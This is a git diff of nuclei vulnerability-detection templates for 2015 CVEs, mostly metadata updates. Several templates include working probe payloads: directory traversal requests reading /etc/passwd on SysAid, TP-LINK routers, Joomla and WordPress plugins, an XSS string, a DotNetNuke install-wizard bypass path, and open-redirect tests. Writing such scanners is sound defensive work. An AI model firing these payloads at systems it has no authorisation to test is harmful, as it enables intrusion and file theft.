remediation: Fixed in version 1.4.14. reference: - https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad @@ -17,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-2196 cwe-id: CWE-89 - epss-score: 0.0093 - epss-percentile: 0.81213 + epss-score: 0.0025 + epss-percentile: 0.6433 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: web-dorado product: spider_calendar framework: wordpress - tags: wordpress,wp,sqli,cve2015,wpscan,wp-plugin,spider-event-calendar,unauth,edb,cve + tags: cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado http: - raw: @@ -42,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# digest: 4a0a00473045022024f566bd4510a61cce4353295828d3562849cde0c7a5e45e70333d2eb33e131d0221008792a996718b2eb454c8c1f1cf4cf47638161ba95ec59ca02e765ce7ee893225:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd7e63311d4cf6f8337571a1a59b5d7011819ff9c6b2ff98931e30318db0adf3022100ffe10684ebe0641b20298ef67f1e62873e23b9e6fc44edd1b0cbc5127ab7103b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-2755.yaml b/nuclei-templates/CVE-2015/CVE-2015-2755.yaml index 930486eced..1c126b301d 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-2755.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-2755.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update to the latest version of the AB Google Map Travel plugin (>=3.5) or apply the vendor-supplied patch to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-score: 6.8 cve-id: CVE-2015-2755 cwe-id: CWE-352 - epss-score: 0.02569 - epss-percentile: 0.8909 + epss-score: 0.01828 + epss-percentile: 0.87952 cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: ab_google_map_travel_project product: ab_google_map_travel framework: wordpress - tags: cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,cve + tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project http: - raw: @@ -54,4 +56,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ab-google-map-travel")' condition: and -# digest: 490a00463044022068fe2c4f26a94ce949aa1eeb0f231610dace2e0a41fb3376e5a56416b435bfdd0220192ad15bf6ef763460579612713ff89ce17b56b7dba659e587f0357019824795:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8cc9f76a8f68db2a3748140015caa53d81843095f1e655982d65ba4131f12a30221008e49c9ca4169a002b1dbb5d8bc1e327243553007a41e8adfc1e6222a47cab0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-2794.yaml b/nuclei-templates/CVE-2015/CVE-2015-2794.yaml new file mode 100644 index 0000000000..54b047868a --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-2794.yaml @@ -0,0 +1,48 @@ +id: CVE-2015-2794 + +info: + name: DotNetNuke 07.04.00 - Administration Authentication Bypass + author: 0xr2r + severity: critical + description: | + The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-2794 + - https://www.exploit-db.com/exploits/39777 + - http://www.dnnsoftware.com/community-blog/cid/155198/workaround-for-potential-security-issue + - http://www.dnnsoftware.com/community/security/security-center + - https://dotnetnuke.codeplex.com/releases/view/615317 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2015-2794 + cwe-id: CWE-264 + epss-score: 0.97458 + epss-percentile: 0.99953 + cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dotnetnuke + product: dotnetnuke + fofa-query: app="DotNetNuke" + tags: cve2015,cve,dotnetnuke,auth-bypass,install + +http: + - method: GET + path: + - "{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Administrative Information" + - "Database Information" + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100963e0da7dc7d871a054737b37e18f3cf4a88a499d60ab976e55a64b8b71b8f4802210098e0935f4fae3fb4f2771f8a890b65875b19cb5f1008ca03c9ac6ee6deebce71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-2863.yaml b/nuclei-templates/CVE-2015/CVE-2015-2863.yaml index 613846ea0f..3a90c56323 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-2863.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-2863.yaml @@ -12,19 +12,21 @@ info: - https://github.com/pedrib/PoC/blob/3f927b957b86a91ce65b017c4b9c93d05e241592/advisories/Kaseya/kaseya-vsa-vuln.txt - http://www.kb.cert.org/vuls/id/919604 - https://nvd.nist.gov/vuln/detail/CVE-2015-2863 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-2863 cwe-id: CWE-601 epss-score: 0.00626 - epss-percentile: 0.76609 + epss-percentile: 0.76747 cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: kaseya product: virtual_system_administrator - tags: cve,cve2015,redirect,kaseya + tags: cve2015,cve,redirect,kaseya http: - method: GET @@ -38,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 -# digest: 4a0a0047304502207cd69f7e040c1b805c185e203a27b7d056b6502794ad03632bd85b496507308e022100b6382056b3a5b60896e87b9e04dffc70456d3aed7a94d309fe962ec1321905fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022033fc40b6ad2baca8ef5a0faf48a297f8e14cac8e720047cf1fe5e96fcc10f293022100cf0c442e4cdd4914c177d6a54eb4d2115d579e4fe66231ee6dab3b91118d424a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-2996.yaml b/nuclei-templates/CVE-2015/CVE-2015-2996.yaml index fa4ba511ed..56ac0bbd61 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-2996.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-2996.yaml @@ -1,32 +1,44 @@ id: CVE-2015-2996 info: - name: SysAid Help Desk <15.2 - Local File Disclosure + name: SysAid Help Desk <15.2 - Local File Inclusion author: 0x_Akoko severity: high description: | - Multiple directory traversal vulnerabilities in SysAid Help Desk before 15.2 allow remote attackers to (1) read arbitrary files via a .. (dot dot) in the fileName parameter to getGfiUpgradeFile or (2) cause a denial of service (CPU and memory consumption) via a .. (dot dot) in the fileName parameter to calculateRdsFileChecksum. + SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server. + remediation: | + Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Jun/8 - - https://nvd.nist.gov/vuln/detail/CVE-2015-2996 - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk - http://seclists.org/fulldisclosure/2015/Jun/8 + - https://nvd.nist.gov/vuln/detail/CVE-2015-2996 + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C + cvss-score: 8.5 cve-id: CVE-2015-2996 cwe-id: CWE-22 + epss-score: 0.77754 + epss-percentile: 0.98153 + cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: + max-request: 2 + vendor: sysaid + product: sysaid shodan-query: http.favicon.hash:1540720428 - tags: cve,cve2015,sysaid,lfi,seclists + tags: cve2015,cve,sysaid,lfi,seclists -requests: +http: - method: GET path: - "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" stop-at-first-match: true + matchers-condition: and matchers: - type: regex @@ -36,3 +48,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450220312369a2b289aed97447a2b6f30dc5d2b433cdaaadac8006d3c5cdac9eac8bcb022100c6c5b7d290b6e9c305b740862e6371ed4874567dc834c7705e73d0655613aa73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-3035.yaml b/nuclei-templates/CVE-2015/CVE-2015-3035.yaml index 655d8fcadc..534a9216db 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-3035.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-3035.yaml @@ -6,22 +6,33 @@ info: severity: high description: | TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. + impact: | + An attacker can read sensitive files on the TP-LINK router, potentially leading to unauthorized access or disclosure of sensitive information. + remediation: | + Apply the latest firmware update provided by TP-LINK to fix the local file inclusion vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Apr/26 - https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt - http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware - https://nvd.nist.gov/vuln/detail/CVE-2015-3035 + - http://www.tp-link.com/en/download/Archer-C5_V1.20.html#Firmware classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2015-3035 cwe-id: CWE-22 + epss-score: 0.58993 + epss-percentile: 0.97444 + cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: tp-link + product: tl-wr841n_\(9.0\)_firmware shodan-query: http.title:"TP-LINK" - verified: "true" - tags: router,lfi,seclists,cve,cve2015,tplink,kev + tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link -requests: +http: - method: GET path: - "{{BaseURL}}/login/../../../etc/passwd" @@ -35,5 +46,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/30 +# digest: 4a0a0047304502204768364244d39e7174ab745661a9b31b5c4a63196ef946111d7805224675b70b022100ffd194906b2d3558567d2e6ac11fa657016da8d600e7908912b66ece312d2f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-3224.yaml b/nuclei-templates/CVE-2015/CVE-2015-3224.yaml deleted file mode 100644 index 34a797940a..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-3224.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2015-3224 - -info: - name: Ruby on Rails Web Console - Remote Code Execution - author: pdteam - severity: critical - description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. - reference: - - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ - - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ - - https://hackerone.com/reports/44513 - - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 - classification: - cve-id: CVE-2015-3224 - tags: ruby,hackerone,cve,cve2015,rce,rails - -requests: - - method: GET - path: - - "{{BaseURL}}/{{randstr}}" - - headers: - X-Forwarded-For: ::1 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Rails.root:" - - "Action Controller: Exception caught" - condition: and - - - type: word - part: response - words: - - "X-Web-Console-Session-Id" - - "data-remote-path=" - - "data-session-id=" - case-insensitive: true - condition: or - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2015/CVE-2015-4062.yaml b/nuclei-templates/CVE-2015/CVE-2015-4062.yaml index 7166bbffa9..a3086ce3cd 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-4062.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-4062.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Update to plugin version 0.9.9 or latest. reference: @@ -19,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2015-4062 cwe-id: CWE-89 - epss-score: 0.03004 - epss-percentile: 0.89849 + epss-score: 0.03919 + epss-percentile: 0.91099 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: authenticated,cve,sqli,wp-plugin,newstatpress,packetstorm,cve2015,wordpress,wp + tags: cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project http: - raw: @@ -49,4 +51,4 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# digest: 4a0a0047304502204dec7c6c36d81070bec045911fab0715a98300ec24459f91434c8b1c77f77349022100ca4ea6580d1c1df64c55ee768d66c6d24eda20f19dc1c2bd5b33fed5c5e5f7cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb6d01be28991515ac71dda8242c7249446951e8cb1a66461263462841119495022100ef9dc6f15e3e424c0eaa861f7e49c07486bda3c3ce0c48b8dc6ff5ffe611a6f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-4063.yaml b/nuclei-templates/CVE-2015/CVE-2015-4063.yaml index ffdd1def42..f569a4a3d6 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-4063.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-4063.yaml @@ -6,6 +6,8 @@ info: severity: low description: | WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Update to plugin version 0.9.9 or latest. reference: - https://packetstormsecurity.com/files/132038/ @@ -19,7 +21,7 @@ info: cve-id: CVE-2015-4063 cwe-id: CWE-79 epss-score: 0.04016 - epss-percentile: 0.91113 + epss-percentile: 0.91867 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm + tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project http: - raw: @@ -47,4 +49,4 @@ http: - 'status_code_2 == 200' - "contains(body_2, '') && contains(body_2, 'newstatpress')" condition: and -# digest: 4a0a00473045022100b1988c578ecd4869b88b860376e662c088ebb46fc387acdfa249d4384ca7aac40220055002cbdbc794c61cb5168cc2f1237d4eeb7ec4391e43cf97069cb0883b761d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0f2e30065dca077f71d175c0be5c923af94f47acfb9c5706268811d87855d9d0220589926117e2ba9dd25f96017a9e5ad2b082115c853eddbc7805ddf2ae30ab9b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-4074.yaml b/nuclei-templates/CVE-2015/CVE-2015-4074.yaml index 01735983ba..7b9c50d4cb 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-4074.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-4074.yaml @@ -5,26 +5,38 @@ info: author: 0x_Akoko severity: high description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. + remediation: | + Upgrade to Joomla! Helpdesk Pro plugin version 1.4.0 or later to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html - https://www.exploit-db.com/exploits/37666/ - - https://www.cvedetails.com/cve/CVE-2015-4074 + - https://nvd.nist.gov/vuln/detail/CVE-2015-4074 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-4074 cwe-id: CWE-22 - tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin + epss-score: 0.00598 + epss-percentile: 0.77961 + cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* + metadata: + max-request: 1 + vendor: helpdesk_pro_project + product: helpdesk_pro + framework: joomla\! + tags: cve2015,cve,lfi,packetstorm,edb,joomla,plugin,helpdesk_pro_project,joomla\!,xss -requests: +http: - method: GET path: - "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe" matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -32,5 +44,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs on 2022/09/08 +# digest: 4a0a0047304502202842932433472fb23fa32b0fb531bf216b2816d459a655b2302110a3b5e191d9022100bcc4cc9601e498334a410e1ff13dfec9aa1aca4ebca8ad7b044b4709e3ec4860:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-4127.yaml b/nuclei-templates/CVE-2015/CVE-2015-4127.yaml index 5d59f8802d..d418678913 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-4127.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-4127.yaml @@ -6,16 +6,44 @@ info: severity: medium description: | WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. + remediation: | + Update to the latest version of the WordPress Church Admin plugin (0.810 or higher) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/37112 - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408 - https://wordpress.org/plugins/church-admin/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4127 classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2015-4127 - tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss + cwe-id: CWE-79 + epss-score: 0.0034 + epss-percentile: 0.68397 + cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: church_admin_project + product: church_admin + framework: wordpress + tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Church Admin =' -requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -35,5 +63,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/31 +# digest: 4b0a00483046022100c5529d0f19b2c265d2588980579e3d4b1321312560cec46437ddd2fab8714242022100b4612385d3dbaaad79be28b6f61cd619e9c90dd9b05c6b83e718bd7dbece46b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-4414.yaml b/nuclei-templates/CVE-2015/CVE-2015-4414.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-4414.yaml rename to nuclei-templates/CVE-2015/CVE-2015-4414.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-4666.yaml b/nuclei-templates/CVE-2015/CVE-2015-4666.yaml new file mode 100644 index 0000000000..0b7f8ae662 --- /dev/null +++ b/nuclei-templates/CVE-2015/CVE-2015-4666.yaml @@ -0,0 +1,29 @@ +id: CVE-2015-4666 +info: + name: Xceedium Xsuite 2.4.4.5 - Directory Traversal + author: 0x_Akoko + severity: high + description: Directory traversal vulnerability in opm/read_sessionlog.php in Xceedium Xsuite 2.4.4.5 and earlier allows remote attackers to read arbitrary files in the logFile parameter. + reference: + - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt + - https://www.cvedetails.com/cve/CVE-2015-4666 + - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html + - http://www.modzero.ch/advisories/MZ-15-02-Xceedium-Xsuite.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-4666 + cwe-id: CWE-22 + tags: cve,cve2015,xceedium,xsuite,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-4668.yaml b/nuclei-templates/CVE-2015/CVE-2015-4668.yaml deleted file mode 100644 index 071a213f24..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-4668.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2015-4668 - -info: - name: Xsuite 2.4.4.5 - Open Redirect - author: 0x_Akoko - severity: medium - description: | - Open redirect vulnerability in Xsuite 2.4.4.5 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirurl parameter. - reference: - - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt - - https://www.cvedetails.com/cve/CVE-2015-4668 - - https://vuldb.com/?id.107082 - - https://www.exploit-db.com/exploits/37708/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2015-4668 - cwe-id: CWE-601 - tags: cve,cve2015,redirect,xsuite,xceedium - -requests: - - method: GET - path: - - '{{BaseURL}}/openwin.php?redirurl=http://interact.sh' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2015/CVE-2015-4694.yaml b/nuclei-templates/CVE-2015/CVE-2015-4694.yaml index ad2ea75727..97b8256f1d 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-4694.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-4694.yaml @@ -1,31 +1,30 @@ id: CVE-2015-4694 + info: - name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval + name: Zip Attachments <= 1.1.4 - Arbitrary File Download author: 0x_Akoko severity: high - description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file. - reference: - - https://wordpress.org/plugins/zip-attachments/#developers - - https://wpscan.com/vulnerability/8047 - - https://nvd.nist.gov/vuln/detail/CVE-2015-4694 - - http://www.vapid.dhs.org/advisory.php?v=126 + description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. + reference: https://wpscan.com/vulnerability/8047 + tags: lfi,wordpress,cve,cve2015,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-score: 8.60 cve-id: CVE-2015-4694 cwe-id: CWE-22 - tags: lfi,wordpress,cve,cve2015,wp-plugin + requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd' + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2015/CVE-2015-5354.yaml b/nuclei-templates/CVE-2015/CVE-2015-5354.yaml deleted file mode 100644 index 5af1fedb8f..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-5354.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2015-5354 - -info: - name: Novius OS 5.0.1-elche - Open Redirect - author: 0x_Akoko - severity: medium - description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. - reference: - - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - - https://vuldb.com/?id.76181 - - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - - https://nvd.nist.gov/vul n/detail/CVE-2015-5354 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2015-5354 - cwe-id: CWE-601 - tags: cve,cve2015,redirect,novius - -requests: - - method: GET - path: - - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2015/CVE-2015-5469.yaml b/nuclei-templates/CVE-2015/CVE-2015-5469.yaml index c9df9cc28c..7fd1a2a4de 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-5469.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-5469.yaml @@ -5,26 +5,38 @@ info: author: 0x_Akoko severity: high description: WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php. + impact: | + The vulnerability can lead to unauthorized access to sensitive files, execution of arbitrary code, and potential compromise of the entire WordPress installation. + remediation: | + Update to the latest version of WordPress MDC YouTube Downloader plugin or apply the patch provided by the vendor. reference: - https://www.openwall.com/lists/oss-security/2015/07/10/5 - http://www.vapid.dhs.org/advisory.php?v=133 - http://www.openwall.com/lists/oss-security/2015/07/10/5 - https://nvd.nist.gov/vuln/detail/CVE-2015-5469 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-5469 cwe-id: CWE-22 - tags: cve,cve2015,wp,lfi + epss-score: 0.02176 + epss-percentile: 0.88248 + cpe: 